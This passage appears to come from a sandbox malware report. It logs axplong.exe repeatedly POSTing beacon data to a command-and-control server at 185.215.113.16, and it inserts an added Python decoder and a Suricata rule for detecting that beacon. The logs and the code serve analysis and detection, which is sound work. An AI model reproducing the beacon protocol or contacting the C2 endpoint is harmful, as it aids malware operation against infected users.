Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:42:15.839762926 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49765 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:42:15.963418007 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Sep 27, 2024 17:42:16.663414001 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0
Sep 27, 2024 17:42:16.759260893 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 154
Cache-Control: no-cache
Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:42:16.987288952 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49766 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:42:17.374164104 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Sep 27, 2024 17:42:18.096131086 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0
Sep 27, 2024 17:42:18.098745108 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 154
Cache-Control: no-cache
Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:42:18.329432011 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                13192.168.2.449769185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:18.448019028 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                 Sep 27, 2024 17:42:19.162811041 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:19 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                 Sep 27, 2024 17:42:19.163757086 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                 Sep 27, 2024 17:42:19.395610094 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:19 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                 Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                                                                                                                 14         | 192.168.2.4 | 49772       | 185.215.113.16 | 80               | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                 Sep 27, 2024 17:42:19.691888094 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                 Sep 27, 2024 17:42:20.351269007 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:20 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                 Sep 27, 2024 17:42:20.352669954 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                 Sep 27, 2024 17:42:20.780484915 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:20 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                 Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                                                                                                                 15         | 192.168.2.4 | 49775       | 185.215.113.16 | 80               | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                 Sep 27, 2024 17:42:20.907125950 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                 Sep 27, 2024 17:42:21.764983892 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:21 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                 Sep 27, 2024 17:42:21.766148090 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                 Sep 27, 2024 17:42:22.024318933 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:21 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                 Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                                                                                                                 16         | 192.168.2.4 | 49778       | 185.215.113.16 | 80               | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                 Sep 27, 2024 17:42:22.202411890 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                 Sep 27, 2024 17:42:22.946219921 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:22 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                 Sep 27, 2024 17:42:22.947155952 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                 Sep 27, 2024 17:42:23.208220959 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:23 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0

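Sessions 13 to 16 above repeat one exchange from axplong.exe to 185.215.113.16, about once per second: a 4-byte POST of `st=s` to /Jo89Ku7d/index.php, answered 200 OK with a `Refresh: 0; url = Login.php` header and a chunked body of a single space, followed on the same connection by a 154-byte POST whose `r=` field is 152 hex characters (76 bytes), answered 200 OK with the chunked body ` <c><d>`. The `r=` value is byte-for-byte identical in every session. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it decodes the chunked reply bodies, parses the form bodies, checks each session for that probe-then-report pattern, and reports whether the `r=` blob repeats across beacons. The wire bytes are copied from the Data Raw and Data Ascii lines; the session list wrapping them is constructed here to mirror the capture; the meaning of the `r=` value and of `<c><d>` is not established by the report, so both are handled as opaque data; and the Suricata rule string is an assumed local rule (arbitrary sid), not the rule behind the report's IDS alert.

```python
"""Decode and fingerprint the beacon exchange captured in sessions 13-16.

Added example; not part of the Joe Sandbox report and not code from the sample.
Wire bytes are copied from the Data Raw / Data Ascii lines; the session list is
constructed here to mirror the capture.  The `r=` value and the `<c><d>` reply
are treated as opaque because the report does not establish their meaning.
"""
import re
from urllib.parse import parse_qs

C2_HOST = "185.215.113.16"
C2_PATH = "/Jo89Ku7d/index.php"

# Copied verbatim from the capture.
PROBE_BODY = bytes.fromhex("73 74 3d 73")                               # "st=s"
PROBE_RESPONSE_RAW = bytes.fromhex("31 0d 0a 20 0d 0a 30 0d 0a 0d 0a")  # chunked " "
REPORT_BODY = (
    b"r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB245"
    b"78B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0"
    b"AB4C6EC28AB3156D80425B09"
)
REPORT_RESPONSE_RAW = bytes.fromhex(
    "37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a"                 # chunked " <c><d>"
)

HEX_RE = re.compile(r"^[0-9A-Fa-f]+$")


def decode_chunked(raw: bytes) -> bytes:
    """Decode an HTTP/1.1 chunked transfer-coding body (trailers are ignored)."""
    out = bytearray()
    pos = 0
    while True:
        eol = raw.index(b"\r\n", pos)
        size = int(raw[pos:eol].split(b";", 1)[0], 16)  # drop chunk extensions
        pos = eol + 2
        if size == 0:                                   # last-chunk
            return bytes(out)
        out += raw[pos:pos + size]
        pos += size
        if raw[pos:pos + 2] != b"\r\n":
            raise ValueError("chunk data not followed by CRLF")
        pos += 2


def parse_form(body: bytes) -> dict:
    """application/x-www-form-urlencoded body -> {field: value} (first value wins)."""
    fields = parse_qs(body.decode("ascii"), keep_blank_values=True)
    return {k: v[0] for k, v in fields.items()}


def build_captured_sessions(count: int = 4) -> list:
    """Constructed mirror of sessions 13-16: one TCP connection, two POSTs each."""
    sessions = []
    for i in range(count):
        probe = {"path": C2_PATH, "host": C2_HOST, "body": PROBE_BODY,
                 "resp_headers": {"Refresh": "0; url = Login.php"},
                 "resp_raw": PROBE_RESPONSE_RAW}
        report = {"path": C2_PATH, "host": C2_HOST, "body": REPORT_BODY,
                  "resp_headers": {}, "resp_raw": REPORT_RESPONSE_RAW}
        sessions.append({"session_id": 13 + i, "exchanges": [probe, report]})
    return sessions


def fingerprint(sessions: list) -> dict:
    """Match the probe-then-report pattern per session and summarise the r= blobs."""
    matched, reports = 0, []
    for s in sessions:
        if len(s["exchanges"]) != 2:
            continue
        probe, report = s["exchanges"]
        probe_ok = (probe["host"] == C2_HOST and probe["path"] == C2_PATH
                    and parse_form(probe["body"]) == {"st": "s"}
                    and "Login.php" in probe["resp_headers"].get("Refresh", "")
                    and decode_chunked(probe["resp_raw"]) == b" ")
        r_val = parse_form(report["body"]).get("r", "")
        report_ok = (report["path"] == C2_PATH and HEX_RE.match(r_val) is not None
                     and len(r_val) % 2 == 0
                     and decode_chunked(report["resp_raw"]) == b" <c><d>")
        if probe_ok and report_ok:
            matched += 1
            reports.append(bytes.fromhex(r_val))
    distinct = set(reports)
    return {
        "sessions": len(sessions),
        "matched": matched,
        "report_len": len(reports[0]) if reports else 0,
        "distinct_reports": len(distinct),
        # One blob across every beacon: the encoding carries no per-request
        # nonce, so the blob itself is a stable content match for this host.
        "deterministic_report": matched > 1 and len(distinct) == 1,
    }


def suricata_rule(sid: int = 1000001) -> str:
    """Assumed local rule keyed on the probe POST (URI plus 4-byte body); sid is arbitrary."""
    return (
        'alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"Amadey-style probe POST st=s"; '
        'flow:established,to_server; http.method; content:"POST"; '
        f'http.uri; content:"{C2_PATH}"; '
        'http.request_body; content:"st=s"; depth:4; '
        f'classtype:trojan-activity; sid:{sid}; rev:1;)'
    )


if __name__ == "__main__":
    print(fingerprint(build_captured_sessions()))
    print(suricata_rule())
```

The rule keys on the URI and the fixed `st=s` body rather than on the `r=` blob: the blob repeats within this capture, so it would match here, but it is hex of 76 opaque bytes that may differ per infected host or per build, whereas the path and probe body are what every session in this report shares.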

                                                                                                                                                                 Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                                                                                                                 17         | 192.168.2.4 | 49781       | 185.215.113.16 | 80               | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                 Sep 27, 2024 17:42:23.334587097 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                 Sep 27, 2024 17:42:24.577430964 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:24 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:24.578175068 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:24.579973936 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:24 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:24.816307068 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:25.128937006 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:25.628432035 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:24 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:25.629648924 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
